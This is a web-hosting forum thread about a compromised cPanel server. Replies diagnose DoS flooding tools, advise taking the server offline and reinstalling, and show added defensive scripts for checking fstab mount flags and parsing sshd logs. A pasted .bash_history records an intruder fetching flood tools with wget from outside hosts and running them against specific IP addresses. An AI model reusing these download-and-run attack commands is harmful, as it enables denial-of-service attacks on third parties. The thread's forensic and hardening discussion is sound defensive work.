/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo /usr/local/cpanel/3rdparty/mailman/cgi-bin/options /usr/local/cpanel/3rdparty/mailman/cgi-bin/private /usr/local/cpanel/3rdparty/mailman/cgi-bin/roster /usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm /usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist /usr/local/cpanel/3rdparty/mailman/cron /usr/local/cpanel/3rdparty/mailman/data /usr/local/cpanel/3rdparty/mailman/filters /usr/local/cpanel/3rdparty/mailman/icons /usr/local/cpanel/3rdparty/mailman/lists /usr/local/cpanel/3rdparty/mailman/lists/mailman /usr/local/cpanel/3rdparty/mailman/locks /usr/local/cpanel/3rdparty/mailman/logs /usr/local/cpanel/3rdparty/mailman/mail /usr/local/cpanel/3rdparty/mailman/mail/mailman /usr/local/cpanel/3rdparty/mailman/qfiles /usr/local/cpanel/3rdparty/mailman/qfiles/virgin /usr/local/cpanel/3rdparty/mailman/qfiles/bounces /usr/local/cpanel/3rdparty/mailman/qfiles/shunt /usr/local/cpanel/3rdparty/mailman/qfiles/commands /usr/local/cpanel/3rdparty/mailman/qfiles/archive /usr/local/cpanel/3rdparty/mailman/qfiles/in /usr/local/cpanel/3rdparty/mailman/qfiles/out /usr/local/cpanel/3rdparty/mailman/qfiles/news /usr/local/cpanel/3rdparty/mailman/qfiles/retry /usr/local/cpanel/3rdparty/mailman/scripts 
/usr/local/cpanel/3rdparty/mailman/spam /usr/local/cpanel/3rdparty/mailman/templates /usr/local/cpanel/3rdparty/mailman/templates/big5 /usr/local/cpanel/3rdparty/mailman/templates/cs /usr/local/cpanel/3rdparty/mailman/templates/de /usr/local/cpanel/3rdparty/mailman/templates/en /usr/local/cpanel/3rdparty/mailman/templates/es /usr/local/cpanel/3rdparty/mailman/templates/et /usr/local/cpanel/3rdparty/mailman/templates/eu /usr/local/cpanel/3rdparty/mailman/templates/fi /usr/local/cpanel/3rdparty/mailman/templates/fr /usr/local/cpanel/3rdparty/mailman/templates/gb /usr/local/cpanel/3rdparty/mailman/templates/hu /usr/local/cpanel/3rdparty/mailman/templates/it /usr/local/cpanel/3rdparty/mailman/templates/ja /usr/local/cpanel/3rdparty/mailman/templates/ko /usr/local/cpanel/3rdparty/mailman/templates/lt /usr/local/cpanel/3rdparty/mailman/templates/nl /usr/local/cpanel/3rdparty/mailman/templates/no /usr/local/cpanel/3rdparty/mailman/templates/pl /usr/local/cpanel/3rdparty/mailman/templates/pt /usr/local/cpanel/3rdparty/mailman/templates/pt_BR /usr/local/cpanel/3rdparty/mailman/templates/ru /usr/local/cpanel/3rdparty/mailman/templates/sr /usr/local/cpanel/3rdparty/mailman/templates/sv /usr/local/cpanel/3rdparty/mailman/templates/uk /usr/local/cpanel/3rdparty/mailman/templates/ca /usr/local/cpanel/3rdparty/mailman/templates/hr /usr/local/cpanel/3rdparty/mailman/templates/ro /usr/local/cpanel/3rdparty/mailman/templates/sl /usr/local/cpanel/3rdparty/mailman/templates/tr /usr/local/cpanel/3rdparty/mailman/pythonlib /usr/local/cpanel/3rdparty/mailman/pythonlib/email /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases /usr/local/cpanel/3rdparty/mailman/pythonlib/lib /usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2 
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages /usr/local/cpanel/3rdparty/mailman/pythonlib/korean /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python /usr/local/cpanel/3rdparty/mailman/messages /usr/local/cpanel/3rdparty/mailman/messages/cs /usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/da /usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/de /usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/es /usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/et /usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/eu /usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/fi /usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/fr /usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/hu /usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/it /usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ja /usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ko /usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/lt /usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/nl /usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/no /usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pl 
/usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pt /usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pt_BR /usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ru /usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sr /usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sv /usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/uk /usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ca /usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/hr /usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ro /usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sl /usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/tr /usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/tests /usr/local/cpanel/3rdparty/mailman/tests/bounces /usr/local/cpanel/3rdparty/mailman/tests/msgs /usr/local/cpanel/3rdparty/mailman/suspended.lists /usr/local/cpanel/3rdparty/phpMyAdmin /usr/local/cpanel/3rdparty/phpMyAdmin/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/images /usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/lang /usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/libraries /usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/scripts /usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS /usr/sbin/sendmail /usr/sbin/utempter /etc/proftpd find: /proc/3209/fd: No such file or directory find: /proc/6268/fd: No 
such file or directory find: /proc/25154/fd/4: No such file or directory That is all... is something bad? Thank you very much... |
Well, it's pretty clear that the system has been cracked. vadimI and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:
Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean! In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack. |
Get a listing of all currently running processes and check the integrity of RPMs with rpm -Va. Once you've got the system offline, you can either remove the compromised system's hard drive, replace it with a new one, then format and re-install from trusted media, or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a backup). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.
If you want to do any kind of further analysis, boot your system with a CD-ROM based Linux distro like Knoppix or FIRE and then mount the compromised HD read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but you never said what user that is. |
Big problem, that is a BIG PROBLEEEEM.... offline, f***...
Yes... user... he runs it every time with the same username (one site) and every time in "var/tmp"; before I ran "scripts/securetmp" he ran it in "tmp"!!! But THAT SITE IS MY SITE!! Yes, I changed the password, that didn't help! In the logs for that site I can't find anything! Also, I can't remove the HD, the server is not mine, I pay a company for that server... But I have many sites on that server... and some of those sites are not mine! How much time must the server be offline, and can I restore all accounts and data for all sites? This can be a big problem; somebody could think that I attack those servers... and I could lose this server from this company! Also, yes, I use ikonboard! |
Have you tried looking at the user's bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?
FWIW, /var/tmp is often writable by normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access. |
Let this be a lesson to people: put your /tmp and /var directories on a separate partition and add the noexec flag in fstab. That will stop a heck of a lot of script kiddies in their tracks.
|
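The two replies above make the same point from both sides: a world-writable /var/tmp lets any account drop and run a script, and a separate partition mounted noexec (with nosuid alongside it) takes that away. A way to check whether fstab actually carries those flags, as an added example that is not part of the thread. It assumes POSIX sh and awk and runs against a constructed fstab; on a real box point it at /etc/fstab.

```shell
#!/bin/sh
# Added example, not from the thread: check whether a mountpoint is a separate mount in
# fstab and whether its options include noexec and nosuid. Assumes POSIX sh and awk.
# FSTAB is a parameter so the demo can use a constructed file; pass /etc/fstab for real.

# Print the options column for MOUNTPOINT, or nothing if fstab has no entry for it.
fstab_opts() {
    awk -v mp="$2" '$1 !~ /^#/ && NF >= 4 && $2 == mp { print $4 }' "$1"
}

# True if the comma-separated option list OPTS contains OPTION as a whole word.
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Classify a mountpoint: "no-separate-mount", "ok", or "missing:<options not present>".
mount_status() {
    opts=$(fstab_opts "$1" "$2")
    if [ -z "$opts" ]; then
        echo "no-separate-mount"
        return
    fi
    missing=""
    for want in noexec nosuid; do
        has_opt "$opts" "$want" || missing="$missing $want"
    done
    if [ -z "$missing" ]; then
        echo "ok"
    else
        echo "missing:${missing# }"
    fi
}

# Constructed fstab: /tmp hardened, /var/tmp on its own partition but still executable,
# /home nosuid only, /var not a separate mount at all.
write_sample_fstab() {
    cat > "$1" <<'EOF'
# device      mountpoint  type  options                 dump pass
/dev/sda2     /           ext3  defaults                1    1
/dev/sda3     /tmp        ext3  defaults,noexec,nosuid  1    2
/dev/sda4     /var/tmp    ext3  defaults                1    2
/dev/sda5     /home       ext3  defaults,nosuid         1    2
EOF
}

# Run with --demo to classify the sample; otherwise: mount_status /etc/fstab /tmp
if [ "${1:-}" = "--demo" ]; then
    f=$(mktemp)
    write_sample_fstab "$f"
    for mp in /tmp /var/tmp /home /var; do
        printf '%-10s %s\n' "$mp" "$(mount_status "$f" "$mp")"
    done
    rm -f "$f"
fi
```

The sample reports /tmp as ok, /var/tmp as missing both flags, /home as missing noexec and /var as no-separate-mount. The flags take effect on the next mount; a remount (mount -o remount,noexec,nosuid /tmp) applies them without a reboot. The /scripts/securetmp the poster mentions earlier is cPanel's way of getting a loop-mounted /tmp with these options.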
Yes, yes, yes..... I found it, I found it...... in ".bash_history" for this account I found this:
ls gcc traceroute ls -a mkdir .h ls -a cd .h wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip wget http://www.aloysio.hpg.ig.com.br/f3 ls unzip vadimI.zip ./v rm -rf *.zip chmod +x * ./v ./vadimI ./f3216.239.39.10465535 600 ./f3 200.152.253.20 1000 600 id uanme -a showmount ls ls -a pwd ps ls ls -a mkdir .c cd .c pwd wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip wget http://www.aloysio.hpg.ig.com.br/f3 rm *.zip wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip rm *.zip chmod +x * ls ./vadimI 24.61.211.193 80 24.61.211.19 w ls ps ps ps ls ls -a mkdir .l cd .l wget http://packetstormsecurity.nl/DoS/udp.pl chmod +x * ./udp.pl ./udp 200.222.175.87 139 1 ./udp.pl 200.222.175.87 139 1 3ps ps cd .... ls perl udp.pl 200.222.169 ls ls -pa ls -a mkdir .... cd .... wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl chmod +x * ./udp.pl 201.5.121 perl udp.pl 201.5.121 ps killall -9 perl ps ls cd .... ls rm u* ls ps killall -9 vadimI ps ls -a cd .... ls wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip chmod +x * rm *.zip ls ./vadimI 200.103.98.206 6667 200.103.98.20 ./vadimI 200.103.98.206 6667 200.103.98.20 ./vadimI 200.103.98.206 6667 200.103.98.20 ls ls -a cd .... ls ./vadimI 66.90.84.99 6667 66.90.84.9 but but but, THAT IS MY ACCOUNT!!!! How he do this? He have SSH access or what? What I can do now? Disable SSH for this account, can I disable all SSH access for this account in WHM.... But I change password for this account.... He use some bad PHP/PERL script for this or what, how I can find that....? Thanks. |
Your best bet would be to put in a fresh system that is armoured to the teeth. The attacker could have made several ways available to her(him)self to regain access to your system. So, disabling ssh or changing your password or root password may not be entirely effective.
The bash_history shows a mix of downloading DoS tools and Linux root exploits (i.e. mremap and ptrace) as well as creation of a number of "hidden" dirs like ... or .l or .k etc. From the bash_history, it's hard to tell if any of the privilege escalation attacks were successful. Again, check the system logs for any application/kernel errors, oops, segfaults, or panics.
As far as how access is attained, that depends on what services are being run (ssh, telnet, etc.). Take a look at the output of last and at /var/log/secure and look for abnormal login info or logins that corresponded to odd activity. You can try turning off ssh, but I was assuming that's how you accessed the system. You can try denying the user access by modifying the sshd config file and adding the DenyUsers <username> directive. Though I'd assume since you are the compromised user, that you'd lock yourself out. If you have an alternative account then you'd still be able to login (just don't tell me it's root). So far you haven't really given us enough info to say how access to your account was attained. It could be a sniffed password, insecure cgi script, some other vuln...hard to say exactly without any real evidence.
Yes, on my server he can access it with ssh/telnet...
When I look in /var/log/secure I find:
Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13914]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13890]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13892]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13915]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13916]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13891]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13893]: Did not receive identification string from IP
Every few days I have this...or every day... Yes, I can't turn off ssh...but I can add "DenyUsers <username>". Yes, I have root access.... Also, if I see correctly in .bash_history, he works directly in /var/tmp, he doesn't change dir (cd some_dir, cd .. ...), he only creates one folder, downloads a file, extracts and executes that file...
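An added example (not code from either poster) of the correlation the reply above recommends: it reads lines in the /var/log/secure format quoted here, counts "Did not receive identification string" probes and failed passwords per source, and flags any accepted login whose source IP also probed or failed first. The log lines, user name and IP addresses are constructed.

```python
import re
from collections import Counter

# Constructed /var/log/secure excerpt in the sshd format quoted above
# (documentation IP ranges, not real hosts).
SAMPLE_SECURE_LOG = """\
Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from 203.0.113.5
Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from 203.0.113.5
Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from 203.0.113.5
Jul 16 20:01:12 plain sshd[14001]: Failed password for webuser from 198.51.100.7 port 40112 ssh2
Jul 16 20:01:15 plain sshd[14001]: Failed password for webuser from 198.51.100.7 port 40112 ssh2
Jul 16 20:01:19 plain sshd[14001]: Accepted password for webuser from 198.51.100.7 port 40112 ssh2
Jul 17 08:12:44 plain sshd[15220]: Accepted password for webuser from 192.0.2.10 port 51000 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
ACCEPT_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)")
FAIL_RE = re.compile(r"Failed (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
NOID_RE = re.compile(r"Did not receive identification string from (?P<ip>\S+)")


def summarize_sshd(log_text):
    """Count probes and failures per source and collect every accepted login."""
    noid, failed, accepted = Counter(), Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd line, or a format we do not parse
        ts, msg = m["ts"], m["msg"]
        if (a := ACCEPT_RE.search(msg)):
            accepted.append((ts, a["user"], a["ip"], a["method"]))
        elif (f := FAIL_RE.search(msg)):
            failed[(f["user"], f["ip"])] += 1
        elif (n := NOID_RE.search(msg)):
            noid[n["ip"]] += 1  # TCP connect with no SSH banner: a scanner
    return {"noid": noid, "failed": failed, "accepted": accepted}


def flag_suspicious_logins(summary):
    """Return accepted logins whose source IP also failed or probed first."""
    flags = []
    for ts, user, ip, method in summary["accepted"]:
        reasons = []
        nfail = summary["failed"][(user, ip)]
        if nfail:
            reasons.append(f"{nfail} failed attempt(s) from same IP before success")
        if summary["noid"][ip]:
            reasons.append("same IP also probed sshd without identifying")
        if reasons:
            flags.append((ts, user, ip, method, "; ".join(reasons)))
    return flags
```

Point the same two functions at the real file and compare flagged logins against the timestamps of the /var/tmp activity; a password login that follows failures from the same source is the classic sign of a guessed or sniffed password.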
Will you please take your bloody server offline already!
No, I can't do that for too much time...I'll lose everything I worked on for a very long time...and also I have people who pay me...
Can somebody tell me how I can disable WGET for this account (only one account)? Not for all accounts! This can help....also, I changed some more things and I'll now edit all scripts for that account! Thanks
Ok, so you're renting this server from another company, and providing hosting services to many sites. So people are paying you to provide a reliable service, but atm you're knowingly allowing another company's machines to participate in Denial of Service attacks on other internet users.
You MUST inform your server provider of the break-in, and ask them to back up your data and reinstall the OS, as the Mods here have told you repeatedly. You won't have anything if this guy decides to completely take control of your precious server and all its hosted sites, so show some action, NOW!
The bug is in the PHP of your site. Turn on safe_mode in your php.ini config file, then restart Apache. Locate any suspicious .php files on your web server that have functions like system.. and search for the string wget in your Apache logs, to find the invader's IP.
Upgrade the version of your kernel; some versions of kernel 2.4 have a bug that allows exploiting the kernel and gaining root access. Verify the ports open on your system and whether there are suspicious executables in ps. Regards.